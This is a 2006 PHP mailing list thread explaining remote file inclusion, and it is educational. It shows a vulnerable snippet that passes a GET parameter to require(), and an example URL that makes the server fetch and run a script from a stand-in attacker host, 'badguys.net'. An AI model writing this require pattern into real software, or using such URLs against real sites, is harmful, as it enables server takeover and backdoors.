Posts like this are what makes this list so great! It's better to read this here than experience it first hand! Thanks Tedd, for highlighting the problem. Tom On 14/11/06, tedd <tedd@xxxxxxxxxxxx> wrote:
At 9:13 PM +0000 11/14/06, Stut wrote: >Ok, so badscript.php is a bad name for this script. Let's say >show.php is a script you've written. You were tired, the kids were >running around you screaming and shouting, and you wrote something >like the following without really thinking about it... > ><?php > require($_GET['path'].'commonfuncs.inc.php'); > // Do other stuff here, using functions in commonfuncs.inc.php >?> > >The *bad guy* can now hit the URL... > >http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored= > >This causes show.php to include (i.e. execute!!) the remote file >injectionscript.txt from badguys.net at this URL... > >http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php > >Since this gets executed on your server it can do anything one of >your scripts can do. The only symptom would be that show.php will >not work for that request. Do the bad guys care? Probably not, >because by the time it fails they've already replaced your index.php >and potentially installed a rootkit, backdoors and whatever else >(depending, of course, on how locked down the web server is and your >file permissions). > >Hope that makes sense now. > >-Stut -Stut: Yes, I believe that the "require($_GET[])" is one of the things Chris Shiflett talks about in his book. I should have guessed that was what everyone was talking about. But, considering that I never do that and my site was highjacked, I was thinking it must have been something different. It all makes sense now. Sorry for being so dense. Thanks everyone. tedd PS: My kids are too old to scream -- it's grand-kids now. -- ------- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
